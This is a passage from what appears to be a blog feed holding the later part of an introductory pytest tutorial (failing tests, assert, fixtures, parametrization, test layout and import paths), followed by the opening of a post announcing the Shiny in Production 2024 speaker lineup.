&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./test_failing.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_addition&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expected &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We run pytest from the command-line and investigate the output.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ pytest -v test_failing.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=============================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_failing.py::test_addition FAILED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;===================================&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FAILURES&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;===================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;________________________________ test_addition _________________________________
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; def test_addition&lt;span style="color:#ff7b72;font-weight:bold"&gt;()&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;result&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; + &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;expected&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;gt; assert &lt;span style="color:#79c0ff"&gt;result&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;E assert &lt;span style="color:#79c0ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_failing.py:4: &lt;span style="color:#79c0ff"&gt;AssertionError&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;===========================&lt;/span&gt; short test summary &lt;span style="color:#79c0ff"&gt;info&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;FAILED test_failing.py::test_addition - assert &lt;span style="color:#79c0ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; failed in 0.03s &lt;span style="color:#ff7b72;font-weight:bold"&gt;===============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This time pytest reports the failure, shows the line where the assertion failed, and prints
the values that were compared (&lt;code&gt;assert 4 == 5&lt;/code&gt;). The &lt;code&gt;-v&lt;/code&gt; or &lt;code&gt;--verbose&lt;/code&gt; command-line flag is used to
produce more detailed output.&lt;/p&gt;
&lt;h3 id="the-assert-statement"&gt;The assert statement&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;assert&lt;/code&gt; statement is used to verify that a given condition is &lt;code&gt;True&lt;/code&gt;.
If the condition is &lt;code&gt;False&lt;/code&gt;, Python raises an &lt;code&gt;AssertionError&lt;/code&gt; and pytest reports the test as failed.
In our first example, the statement &lt;code&gt;assert result == expected&lt;/code&gt;
asserts that the result from &lt;code&gt;calculate_mean(x)&lt;/code&gt;
should equal &lt;code&gt;3.0&lt;/code&gt;.&lt;/p&gt;
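&lt;p&gt;The following plain-Python sketch shows what happens when an assertion does not hold: Python raises an &lt;code&gt;AssertionError&lt;/code&gt;, which is what a test runner catches and reports. The helper &lt;code&gt;describe_assertion&lt;/code&gt; is hypothetical and only exists here to capture the error instead of letting it propagate.&lt;/p&gt;

```python
def calculate_mean(x):
    return sum(x) / len(x)


def describe_assertion(result, expected):
    """Run an assert and describe what happened (hypothetical helper)."""
    try:
        # The optional message after the comma is attached to the error.
        assert result == expected, f"expected {expected}, got {result}"
    except AssertionError as err:
        return f"failed: {err}"
    return "passed"


print(describe_assertion(calculate_mean([1, 2, 3, 4, 5]), 3.0))
print(describe_assertion(2 + 2, 5))
```

&lt;p&gt;The first call passes because the mean is exactly &lt;code&gt;3.0&lt;/code&gt;; the second fails in the same way as the &lt;code&gt;test_addition&lt;/code&gt; example above. In a real test you would write the bare &lt;code&gt;assert&lt;/code&gt; and let pytest handle the error.&lt;/p&gt;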
&lt;h3 id="pytest-fixtures"&gt;Pytest fixtures&lt;/h3&gt;
&lt;p&gt;Suppose you have written several functions that all work on some non-trivial dataset,
and you want to write a test function for each. In each test function, you would
have to create a dataset of the required form, pass it into the function under test,
and then compare the output to some expected value. The code for creating the
test dataset may end up duplicated across the different test functions.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://docs.pytest.org/en/6.2.x/fixture.html" rel="external"&gt;Fixtures&lt;/a&gt; in pytest are helper functions which are
used to set up conditions that we want to be available for multiple tests. This might involve
putting together some test data, or preparing some other state before a test runs (connecting to a
database, creating a temporary file). Fixtures are run before (and sometimes after) the actual test
functions. The &lt;em&gt;@pytest.fixture&lt;/em&gt; decorator is used to tell pytest that a function is a fixture.
Fixtures can perform actions (like setting up a database connection), and can inject data into a
test function.&lt;/p&gt;
&lt;p&gt;To illustrate, let us consider a fixture that provides a list of numbers
in our test file &lt;code&gt;test_my_functions.py&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./test_my_functions.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pytest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;my_functions&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; calculate_mean
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@pytest.fixture&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample_numbers&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_calculate_mean&lt;/span&gt;(sample_numbers):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; calculate_mean(sample_numbers)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expected &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By using &lt;em&gt;@pytest.fixture&lt;/em&gt;, we have defined a &lt;code&gt;sample_numbers&lt;/code&gt; fixture that returns the list
&lt;code&gt;[1, 2, 3, 4, 5]&lt;/code&gt;.
This fixture can be used in any test function by adding it as an argument. Fixtures are especially
useful when you need to set up more complex objects that multiple tests will use.&lt;/p&gt;
&lt;p&gt;The test output would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ pytest -vv test_my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=============================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; passed in 0.00s &lt;span style="color:#ff7b72;font-weight:bold"&gt;===============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="parametrization"&gt;Parametrization&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.pytest.org/en/6.2.x/parametrize.html#parametrize-basics" rel="external"&gt;Parametrization&lt;/a&gt; is an
important feature of pytest which allows us to run a test with multiple sets of parameters.
This is helpful when we want to check the same logic under different conditions without writing
separate test functions.&lt;/p&gt;
&lt;p&gt;Here is how we can use parametrization in the &lt;code&gt;test_my_functions.py&lt;/code&gt; file to test &lt;code&gt;calculate_mean&lt;/code&gt;
with multiple inputs:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./test_my_functions.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pytest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;my_functions&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; calculate_mean
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@pytest.mark.parametrize&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;numbers, expected&amp;#34;&lt;/span&gt;, [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ([&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;3.0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ([&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;20.0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ([&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;21&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;14.0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ([&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;5.0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_calculate_mean_parametrized&lt;/span&gt;(numbers, expected):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; calculate_mean(numbers)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this example, &lt;em&gt;@pytest.mark.parametrize&lt;/em&gt; allows us to test &lt;code&gt;calculate_mean&lt;/code&gt; with four different
lists.
Each tuple in the list passed to parametrize represents a different test case with its own numbers
and expected values.&lt;/p&gt;
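&lt;p&gt;Conceptually, parametrization runs the same check once per tuple and reports each case on its own. The sketch below imitates that idea in plain Python, without pytest. The helper &lt;code&gt;run_cases&lt;/code&gt; is hypothetical and is not part of pytest, which generates a separate test item for each case rather than looping inside one function.&lt;/p&gt;

```python
def calculate_mean(x):
    return sum(x) / len(x)


# Each tuple is one case: (input list, expected mean).
CASES = [
    ([1, 2, 3, 4, 5], 3.0),
    ([10, 20, 30], 20.0),
    ([7, 14, 21], 14.0),
    ([5, 5, 5, 5], 5.0),
]


def run_cases(func, cases):
    """Check every case independently and return one outcome per case."""
    outcomes = []
    for numbers, expected in cases:
        outcomes.append("PASSED" if func(numbers) == expected else "FAILED")
    return outcomes


print(run_cases(calculate_mean, CASES))
# ['PASSED', 'PASSED', 'PASSED', 'PASSED']
```

&lt;p&gt;Because every case gets its own outcome, one failing input does not hide the results of the others, which is the main advantage over a single test with several assertions.&lt;/p&gt;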
&lt;p&gt;Then to run the test we use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ pytest -v test_my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=========================================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=========================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean_parametrized&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;numbers0-3.0&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt; 25%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean_parametrized&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;numbers1-20.0&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt; 50%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean_parametrized&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;numbers2-14.0&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt; 75%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean_parametrized&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;numbers3-5.0&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==========================================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; passed in 0.01s &lt;span style="color:#ff7b72;font-weight:bold"&gt;==========================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The output is slightly different here: each set of parameters is run as a separate test case, and a
result is reported for each of them.&lt;/p&gt;
&lt;h3 id="test-organization"&gt;Test organization&lt;/h3&gt;
&lt;p&gt;In the above, our test scripts (&lt;code&gt;test_my_functions.py&lt;/code&gt; and &lt;code&gt;test_failing.py&lt;/code&gt;) and Python modules
(&lt;code&gt;my_functions.py&lt;/code&gt;) were all in the same directory. We used this approach for simplicity (as our
focus was on how to write and run tests). In a larger project you may have many test scripts and
Python modules, and this approach will quickly become difficult to manage.&lt;/p&gt;
&lt;p&gt;To keep your project organised, it&amp;rsquo;s a good practice to place all tests in a &lt;code&gt;tests/&lt;/code&gt; directory.
This way, when we run pytest we receive a summary of all the project&amp;rsquo;s tests. On making this change,
the file structure for the above example is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;./intro-to-python/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── tests/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ ├── test_failing.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ └── test_my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;└── venv/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However, there is a small problem here. The &lt;code&gt;my_functions.py&lt;/code&gt; module must be imported by the
&lt;code&gt;test_my_functions.py&lt;/code&gt; test script. But if we call &lt;code&gt;pytest tests/&lt;/code&gt; from the project root,
the directory containing &lt;code&gt;my_functions.py&lt;/code&gt; isn&amp;rsquo;t automatically added to the Python search path (the list of
directories from which packages and modules can be imported by the running Python session), so the module
can&amp;rsquo;t be imported by &lt;code&gt;test_my_functions.py&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;A simple solution for this is to use the following command instead of &lt;code&gt;pytest tests/&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ python -m pytest tests/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When we run pytest through &lt;code&gt;python -m&lt;/code&gt;, the current directory is added to
the Python search path, so any Python modules in it can be imported by the tests.&lt;/p&gt;
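&lt;p&gt;To see why the search path matters, here is a minimal sketch (not part of the original example) that rebuilds the layout above in a temporary directory and asks Python&amp;rsquo;s import machinery whether &lt;code&gt;my_functions&lt;/code&gt; can be found on a given list of directories. The helper &lt;code&gt;can_import()&lt;/code&gt; and the body of &lt;code&gt;calculate_mean()&lt;/code&gt; are illustrative assumptions, and the two directory lists only roughly mimic what &lt;code&gt;pytest tests/&lt;/code&gt; and &lt;code&gt;python -m pytest tests/&lt;/code&gt; set up.&lt;/p&gt;

```python
import tempfile
from importlib.machinery import PathFinder
from pathlib import Path


def can_import(module_name, search_path):
    """Return True if module_name can be located in the given directories."""
    directories = [str(directory) for directory in search_path]
    return PathFinder.find_spec(module_name, directories) is not None


with tempfile.TemporaryDirectory() as tmp:
    # Rebuild the example layout: my_functions.py next to a tests/ directory.
    # The function body is an assumption made for illustration.
    root = Path(tmp)
    (root / "my_functions.py").write_text(
        "def calculate_mean(numbers):\n"
        "    return sum(numbers) / len(numbers)\n"
    )
    (root / "tests").mkdir()

    # Roughly what "pytest tests/" sees: tests/ is searched, the root is not.
    found_from_tests_only = can_import("my_functions", [root / "tests"])

    # Roughly what "python -m pytest tests/" sees: the root is searched too.
    found_with_root = can_import("my_functions", [root / "tests", root])

print(found_from_tests_only)  # False
print(found_with_root)  # True
```

&lt;p&gt;The module is only found once the project root is among the searched directories, which is the effect of running pytest through &lt;code&gt;python -m&lt;/code&gt; from that root.&lt;/p&gt;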
&lt;p&gt;A more robust solution (and one we would recommend for larger projects) is to place your Python
modules in a package structure, though that is beyond the scope of this introduction to pytest.&lt;/p&gt;
&lt;p&gt;Ready to start testing your code? Enjoy your journey into Python testing, and happy coding!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/intro-to-pytest/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2024: Full speaker lineup</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/</link><pubDate>Thu, 08 Aug 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h4 a:after { content: unset; }
main h4 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;We are pleased to announce the full line-up for this year&amp;rsquo;s &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference! This year, we&amp;rsquo;re introducing a new lightning talk session. These short 5-minute talks will allow us to showcase many more uses of Shiny in Production. The conference will still feature 6 full-length talks, alongside the lightning talk session.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="talks"&gt;Talks&lt;/h3&gt;
&lt;h4 id="cara-thompson---freelance-data-consultant"&gt;&lt;a href="https://www.linkedin.com/in/cararthompson/" rel="external"&gt;Cara Thompson&lt;/a&gt; - &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Freelance Data Consultant&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Data-To-Wow: Leveraging Shiny as a no-code solution for high-end parameterised visualisations&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/cara@2x.jpg" alt="Photo of Cara Thompson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
